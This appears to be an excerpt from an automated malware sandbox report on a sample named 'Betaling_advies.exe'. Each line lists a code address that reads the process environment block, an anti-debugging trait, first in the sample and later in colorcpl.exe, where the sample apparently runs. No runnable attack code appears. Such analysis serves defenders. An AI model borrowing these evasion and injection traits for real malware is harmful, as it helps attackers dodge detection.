          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AEB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00B08A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A7927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A39240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A39240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A39240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A39240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AFEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AC4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A64BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A64BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A64BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00B05BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AF138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A41B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A41B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AED380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A62397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A6B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A5DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AB53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AB53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AF131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A3DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A63B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A63B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A3DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00B08B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A3F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A4849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AF14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AB6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AB6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AB6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00B08CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A6BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AB6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AB6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AB6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AB6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00B0740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00B0740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00B0740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A5746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A6A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00ACC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00ACC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A635A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A61DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A61DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A61DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00B005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00B005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A62581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A62581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A62581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A62581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A32D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A32D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A32D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A32D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A32D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A6FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A6FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A4D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A4D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AFFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AFFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AFFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AFFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AE8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AB6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AB6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AB6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AB6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AB6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AB6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00B08D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A3AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AFE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00ABA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A64D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A64D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A64D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A5C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A5C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A73D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AB3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AE3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A57D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AB46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00B00EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00B00EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00B00EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00ACFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A616E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A476E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A78EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00B08ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A636CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AEFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A3E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AEFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A3C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A3C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A3C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A68E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AF1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A6A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A6A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A4766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A5AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A5AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A5AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A5AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A5AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AFAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AFAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A48794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AB7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AB7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AB7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A737F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A34F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A34F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A6E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A6A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A6A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A5F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00ACFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00ACFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00B0070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00B0070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A4FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00B08F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A4EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046E746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046FA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0475C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0475C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046FBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0479740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0479740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0479740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04781C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04781C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04781C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04781C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04781C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04781C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04781C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04781C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04781C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04781C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04781C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04781C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04781C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04781C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04746C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04746C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04746C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04746C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_047814FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04746CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04746CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04746CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04798CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046EC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046EC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04703D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04743540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046E7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0478E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0474A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04798D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046CAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04778DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046DD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046DD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0478FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0478FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0478FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0478FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04746DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04746DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04746DC9 mov eax, dword ptr fs:[00000030h]
